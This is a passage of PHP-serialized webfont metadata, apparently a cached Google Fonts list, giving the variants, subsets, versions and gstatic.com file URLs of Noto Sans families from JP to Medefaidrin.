JP\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"700\";i:5;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v42\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"100\";s:82:\"http://fonts.gstatic.com/s/notosansjp/v42/-F6ofjtqLzI2JPCgQBnw7HFQoggM-FNthvIU.otf\";s:3:\"300\";s:84:\"http://fonts.gstatic.com/s/notosansjp/v42/-F6pfjtqLzI2JPCgQBnw7HFQaioq1H1hj-sNFQ.otf\";s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/notosansjp/v42/-F62fjtqLzI2JPCgQBnw7HFowAIO2lZ9hg.otf\";s:3:\"500\";s:84:\"http://fonts.gstatic.com/s/notosansjp/v42/-F6pfjtqLzI2JPCgQBnw7HFQMisq1H1hj-sNFQ.otf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/notosansjp/v42/-F6pfjtqLzI2JPCgQBnw7HFQei0q1H1hj-sNFQ.otf\";s:3:\"900\";s:84:\"http://fonts.gstatic.com/s/notosansjp/v42/-F6pfjtqLzI2JPCgQBnw7HFQQi8q1H1hj-sNFQ.otf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:879;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Javanese\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:8:\"javanese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/notosansjavanese/v15/2V0AKJkDAIA6Hp4zoSScDjV0Y-eoHAHJ8r88Rp29eA.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/notosansjavanese/v15/2V0DKJkDAIA6Hp4zoSScDjV0Y-eoHAHxTpAYTrahcTyFxQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:880;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Noto Sans KR\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"700\";i:5;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v27\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"100\";s:82:\"http://fonts.gstatic.com/s/notosanskr/v27/Pby6FmXiEBPT4ITbgNA5CgmOsn7uwpYcuH8y.otf\";s:3:\"300\";s:84:\"http://fonts.gstatic.com/s/notosanskr/v27/Pby7FmXiEBPT4ITbgNA5CgmOelzI7rgQsWYrzw.otf\";s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/notosanskr/v27/PbykFmXiEBPT4ITbgNA5Cgm20HTs4JMMuA.otf\";s:3:\"500\";s:84:\"http://fonts.gstatic.com/s/notosanskr/v27/Pby7FmXiEBPT4ITbgNA5CgmOIl3I7rgQsWYrzw.otf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/notosanskr/v27/Pby7FmXiEBPT4ITbgNA5CgmOalvI7rgQsWYrzw.otf\";s:3:\"900\";s:84:\"http://fonts.gstatic.com/s/notosanskr/v27/Pby7FmXiEBPT4ITbgNA5CgmOUlnI7rgQsWYrzw.otf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:881;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Kaithi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"kaithi\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosanskaithi/v15/buEtppS9f8_vkXadMBJJu0tWjLwjQi0KdoZIKlo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:882;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Kannada\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:7:\"kannada\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:126:\"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrDvMzSIMLsPKrkY.ttf\";s:3:\"200\";s:126:\"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrLvNzSIMLsPKrkY.ttf\";s:3:\"300\";s:126:\"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrGXNzSIMLsPKrkY.ttf\";s:7:\"regular\";s:126:\"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrDvNzSIMLsPKrkY.ttf\";s:3:\"500\";s:126:\"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrAnNzSIMLsPKrkY.ttf\";s:3:\"600\";s:126:\"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrOXKzSIMLsPKrkY.ttf\";s:3:\"700\";s:126:\"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrNzKzSIMLsPKrkY.ttf\";s:3:\"800\";s:126:\"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrLvKzSIMLsPKrkY.ttf\";s:3:\"900\";s:126:\"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrJLKzSIMLsPKrkY.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:883;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Kayah Li\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:8:\"kayah-li\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:110:\"http://fonts.gstatic.com/s/notosanskayahli/v18/B50nF61OpWTRcGrhOVJJwOMXdca6Yecki3E06x2jVTX3WCc3CZH4EXLuKVM.ttf\";s:3:\"500\";s:110:\"http://fonts.gstatic.com/s/notosanskayahli/v18/B50nF61OpWTRcGrhOVJJwOMXdca6Yecki3E06x2jVTX3WBU3CZH4EXLuKVM.ttf\";s:3:\"600\";s:110:\"http://fonts.gstatic.com/s/notosanskayahli/v18/B50nF61OpWTRcGrhOVJJwOMXdca6Yecki3E06x2jVTX3WPkwCZH4EXLuKVM.ttf\";s:3:\"700\";s:110:\"http://fonts.gstatic.com/s/notosanskayahli/v18/B50nF61OpWTRcGrhOVJJwOMXdca6Yecki3E06x2jVTX3WMAwCZH4EXLuKVM.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:884;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Noto Sans Kharoshthi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:10:\"kharoshthi\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/notosanskharoshthi/v15/Fh4qPiLjKS30-P4-pGMMXCCfvkc5Vd7KE5z4rFyx5mR1.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:885;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Khmer\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:121:\"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYuNAZz4kAbrddiA.ttf\";s:3:\"200\";s:121:\"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYsNAJz4kAbrddiA.ttf\";s:3:\"300\";s:121:\"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYvTAJz4kAbrddiA.ttf\";s:7:\"regular\";s:121:\"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYuNAJz4kAbrddiA.ttf\";s:3:\"500\";s:121:\"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYu_AJz4kAbrddiA.ttf\";s:3:\"600\";s:121:\"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYtTB5z4kAbrddiA.ttf\";s:3:\"700\";s:121:\"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYtqB5z4kAbrddiA.ttf\";s:3:\"800\";s:121:\"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYsNB5z4kAbrddiA.ttf\";s:3:\"900\";s:121:\"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYskB5z4kAbrddiA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:886;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Khojki\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"khojki\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosanskhojki/v15/-nFnOHM29Oofr2wohFbTuPPKVWpmK_d709jy92k.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:887;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Sans Khudawadi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:9:\"khudawadi\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/notosanskhudawadi/v15/fdNi9t6ZsWBZ2k5ltHN73zZ5hc8HANlHIjRnVVXz9MY.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:888;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Noto Sans Lao\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:3:\"lao\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:117:\"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt4ccfdf5MK3riB2w.ttf\";s:3:\"200\";s:117:\"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt48cbdf5MK3riB2w.ttf\";s:3:\"300\";s:117:\"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt4L8bdf5MK3riB2w.ttf\";s:7:\"regular\";s:117:\"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt4ccbdf5MK3riB2w.ttf\";s:3:\"500\";s:117:\"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt4Q8bdf5MK3riB2w.ttf\";s:3:\"600\";s:117:\"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt4r8Hdf5MK3riB2w.ttf\";s:3:\"700\";s:117:\"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt4lsHdf5MK3riB2w.ttf\";s:3:\"800\";s:117:\"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt48cHdf5MK3riB2w.ttf\";s:3:\"900\";s:117:\"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt42MHdf5MK3riB2w.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:889;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Lepcha\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"lepcha\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosanslepcha/v15/0QI7MWlB_JWgA166SKhu05TekNS32AJstqBXgd4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:890;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Limbu\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"limbu\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/notosanslimbu/v15/3JnlSDv90Gmq2mrzckOBBRRoNJVj0MF3OHRDnA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:891;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Linear A\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:8:\"linear-a\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/notosanslineara/v16/oPWS_l16kP4jCuhpgEGmwJOiA18FZj22zmHQAGQicw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:892;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Linear B\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:8:\"linear-b\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/notosanslinearb/v15/HhyJU4wt9vSgfHoORYOiXOckKNB737IV3BkFTq4EPw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:893;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Noto Sans Lisu\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"lisu\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:102:\"http://fonts.gstatic.com/s/notosanslisu/v21/uk-3EGO3o6EruUbnwovcYhz6kh57_nqbcTdjJnHP2Vwt29IlxkVdig.ttf\";s:3:\"500\";s:102:\"http://fonts.gstatic.com/s/notosanslisu/v21/uk-3EGO3o6EruUbnwovcYhz6kh57_nqbcTdjJnHP61wt29IlxkVdig.ttf\";s:3:\"600\";s:102:\"http://fonts.gstatic.com/s/notosanslisu/v21/uk-3EGO3o6EruUbnwovcYhz6kh57_nqbcTdjJnHPB1st29IlxkVdig.ttf\";s:3:\"700\";s:102:\"http://fonts.gstatic.com/s/notosanslisu/v21/uk-3EGO3o6EruUbnwovcYhz6kh57_nqbcTdjJnHPPlst29IlxkVdig.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:894;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Lycian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"lycian\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosanslycian/v15/QldVNSNMqAsHtsJ7UmqxBQA9r8wA5_naCJwn00E.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:895;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Lydian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"lydian\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosanslydian/v15/c4m71mVzGN7s8FmIukZJ1v4ZlcPReUPXMoIjEQI.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:896;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Mahajani\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:8:\"mahajani\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/notosansmahajani/v15/-F6sfiVqLzI2JPCgQBnw60Agp0JrvD5Fh8ARHNh4zg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:897;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Sans Malayalam\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:9:\"malayalam\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:131:\"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_RuH9BFzEr6HxEA.ttf\";s:3:\"200\";s:131:\"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_xuD9BFzEr6HxEA.ttf\";s:3:\"300\";s:131:\"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_GOD9BFzEr6HxEA.ttf\";s:7:\"regular\";s:131:\"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_RuD9BFzEr6HxEA.ttf\";s:3:\"500\";s:131:\"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_dOD9BFzEr6HxEA.ttf\";s:3:\"600\";s:131:\"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_mOf9BFzEr6HxEA.ttf\";s:3:\"700\";s:131:\"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_oef9BFzEr6HxEA.ttf\";s:3:\"800\";s:131:\"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_xuf9BFzEr6HxEA.ttf\";s:3:\"900\";s:131:\"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_7-f9BFzEr6HxEA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:898;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Mandaic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"mandaic\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosansmandaic/v15/cIfnMbdWt1w_HgCcilqhKQBo_OsMI5_A_gMk0izH.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:899;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Noto Sans Manichaean\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:10:\"manichaean\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/notosansmanichaean/v15/taiVGntiC4--qtsfi4Jp9-_GkPZZCcrfekqCNTtFCtdX.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:900;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Marchen\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"marchen\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosansmarchen/v15/aFTO7OZ_Y282EP-WyG6QTOX_C8WZMHhPk652ZaHk.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:901;O:8:\"stdClass\":8:{s:6:\"family\";s:23:\"Noto Sans Masaram Gondi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:13:\"masaram-gondi\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/notosansmasaramgondi/v15/6xK_dThFKcWIu4bpRBjRYRV7KZCbUq6n_1kPnuGe7RI9WSWX.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:902;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Noto Sans Math\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:4:\"math\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/notosansmath/v15/7Aump_cpkSecTWaHRlH2hyV5UHkG-V048PW0.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:903;O:8:\"stdClass\":8:{s:6:\"family\";s:24:\"Noto Sans Mayan Numerals\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:14:\"mayan-numerals\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:107:\"http://fonts.gstatic.com/s/notosansmayannumerals/v15/PlIuFk25O6RzLfvNNVSivR09_KqYMwvvDKYjfIiE68oo6eepYQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:904;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Noto Sans Medefaidrin\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:11:\"medefaidrin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:118:\"http://fonts.gstatic.com/s/notosansmedefaidrin/v19/WwkzxOq6Dk-wranENynkfeVsNbRZtbOIdLb1exeM4ZeuabBfmErWlT318e5A3rw.ttf\";s:3:\"500\";s:118:\"http://fonts.gstatic.com/s/notosansmedefaidrin/v19/WwkzxOq6Dk-wranENynkfeVsNbRZtbOIdLb1exeM4ZeuabBfmHjWlT318e5A3rw.ttf\";s:3:\"600\";s:118:\"http://fonts.gstatic.com/s/notosansmedefaidrin/v19/WwkzxOq6Dk-wranENynkfeVsNbRZtbOIdLb1exeM4ZeuabBfmJTRlT318e5A3rw.ttf\";s:3:\"700\";s:118:\"http://fonts.gstatic.com/s/notosansmedefaidrin/v19/WwkzxOq6Dk-wranENynkfeVsNbRZtbOIdLb1exeM4ZeuabBfmK3RlT318e5A3rw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:905;O:8:\"s